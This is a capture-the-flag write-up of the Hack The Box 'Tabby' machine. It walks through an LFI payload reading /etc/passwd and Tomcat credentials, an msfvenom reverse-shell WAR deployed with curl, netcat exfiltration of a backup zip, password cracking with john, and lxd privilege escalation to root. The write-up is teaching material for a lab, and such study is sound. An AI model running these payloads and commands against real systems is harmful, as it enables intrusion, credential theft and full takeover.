Hello cyber geeks! I am back with another writeup. This time I have made a walkthrough of Hackthebox machine name tabby(linux).
So let’s get start this:
Let start the recon with nmap.
nmap -sC -sV -oN nmap.txt 10.10.10.194
# Nmap 7.91 scan initiated Sat Nov 7 20:03:51 2020 as: nmap -sC -sV -oN nmap.txt 10.10.10.194
Nmap scan report for 10.10.10.194
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 7 20:04:27 2020 -- 1 IP address (1 host up) scanned in 36.75 seconds
- -sC: run default nmap scripts
- -sV: detect service version
As you can see there are three ports open:
- Port 22: ssh
- Port 80: Apache
- Port 8080: Tomcat
Let’s start this with port 80. Now open the ip in browser. And there you will see this
So it’s look like hosting. If you enumerate the website you will found nothing as suspicious. So let’s click on the NEWS. And there you will get error. So if you notice the URL it is megahosting.htb. So you have to add the ip in your host.
So after refreshing the tab you will see some text like apologize and all. If you will check the source code you will find nothing. Now if you will notice the url it says “http://megahosting.htb/news.php?file=statement”.
Are you thinking the same what I am thinking? Yeah let’s try LFI. So this the link for exploits of LFI.
Local File Inclusion (LFI) — Web Application Penetration Testing
The definitive guide for LFI vulnerability security testing for bug hunting & penetration testing engagements.
So I tried the basic one. http://megahosting.htb/news.php?file=../../../../../../../../etc/passwd. And BOOM!! it was vulnerable.
So you can’t get much more things from this. Let’s try to see the another port i.e 8080. So if you open that in browser it looks like this.
As you can see tomcat9 is running. Now if find exploit for tomcat9 no one will work. Let’s see the directories and files on port 8080.
└─$ gobuster dir -u http://10.10.10.194:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x txt,php,html,css 2>/dev/null
So if you open docs you will find the documentation of tomcat and in manager you will get the login page.
Let’s see how we can exploit the tomcat.
Multiple Ways to Exploit Tomcat Manager
Hello Friends, today through this article I would like to share my experience "how to exploit Tomcat Manager…
With the help of msfvenom we can make a payload for revershell.
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.4 lport=1256 -f war -o shell.war
So for uploading the shell we have to find the credentials of manager. If you try the default credentials of tomcat it won’t work. Let’s see the where credentials are stored. So here first we need to understand its directory structure of tomcat.
What is the Tomcat installation directory?
Based here I'm trying to setup Tomcat Server, I have successfully installed it and tested it. Then I stopped it as…
What is Tomcat default administrator password ? - Mkyong.com
Is there or what is the default administrator user and password for Tomcat? Tested : Tomcat 8.0.30 Tomcat 7.0.67 Tomcat…
So password are stored in /usr/share/tomcat9/etc/tomcat-users.xml. Now we can access this using LFI.
Now check the source code you will find the creds.
Now if you try to login in /manger you will get error. As we have credentials we can upload the shell. But if try to login with the credentials it will give the error. With the help of curl we can also upload the shell
curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/tabbyhack-shell'
So now we have to open a listener and then open the file in the browser. I used netcat listener.And then open the file http://10.10.10.194:8080/tabbyhack-shell/
Whooh!!… we got the shell. Now we have to make interactive using python tty.
python3 -c 'import pty; pty.spawn("/bin/sh")'
As now we have to enumerate. So for this I use linpeas.sh
Now we have transfer the linpeas from out local machine to attacker machine.I used python http server for transferring files.
In local machine:
python -m SimpleHTTPServer 1226
You have to start this in the directory where linpeas is there.
In attacker machine:
Then “chmod +x linpeas.sh” and “./linpeas.sh”
We got a user ash. And backup file.
As we can’t unzip that file in the attacking machine so we have to transfer the file from attacking machine to local machine.
In attacker machine:
nc -w 3 10.10.14.125 4444<16162020_backup.zipIn local machine:
nc -l -p 4444 >16162020_backup.zip
Now we have the zip file in our attacking machine now unzip that.
And it is asking for password and we don’t have password. Now we have to find the password for the file using john.
sudo zip2john 16162020_backup.zip > hash
sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
GETTING USER ACCESS:-
Then we got the password of the zip:- admin@it
So if you unzip the files which are in /var/www/html
So now we can try this as ssh password of user ash.
GETTING ROOT ACCESS:-
So here we go with our usual command i.e id
But here lxd look’s suspicious!
So if you google that try to search then you will get this link.
Lxd Privilege Escalation
In this post we are going to describes how an account on the system that is a member of the lxd group is able to…
So I have just copy and paste the commands told there and BOOM!! I am root.
In local machine:
1.git clone https://github.com/saghul/lxd-alpine-builder.git
Then it will make one tar.gz file and you have to transfer this file into the attacker machine.
And now in attacker machine
In attacker machine:-
* wget http://10.10.10.2:1326/alpine-v3.12-x86_64-20200823_2015.tar.gz
* cp alpine-v3.12-x86_64-20200823_2015.tar.gz /home/ash
* lxc image import ./alpine-v3.12-x86_64-20200823_2015.tar.gz --alias myimage
* lxc image list
* lxc init myimage ignite -c security.privileged=true
* lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
* lxc start ignite
* lxc exec ignite /bin/sh
So I am having error like already running because I am doing these commands twice. Now we have to cat the root.txt.
So the summary of root part is it is moving root folder into a container and then mount that container into machine.
So I hope you enjoyed while reading!!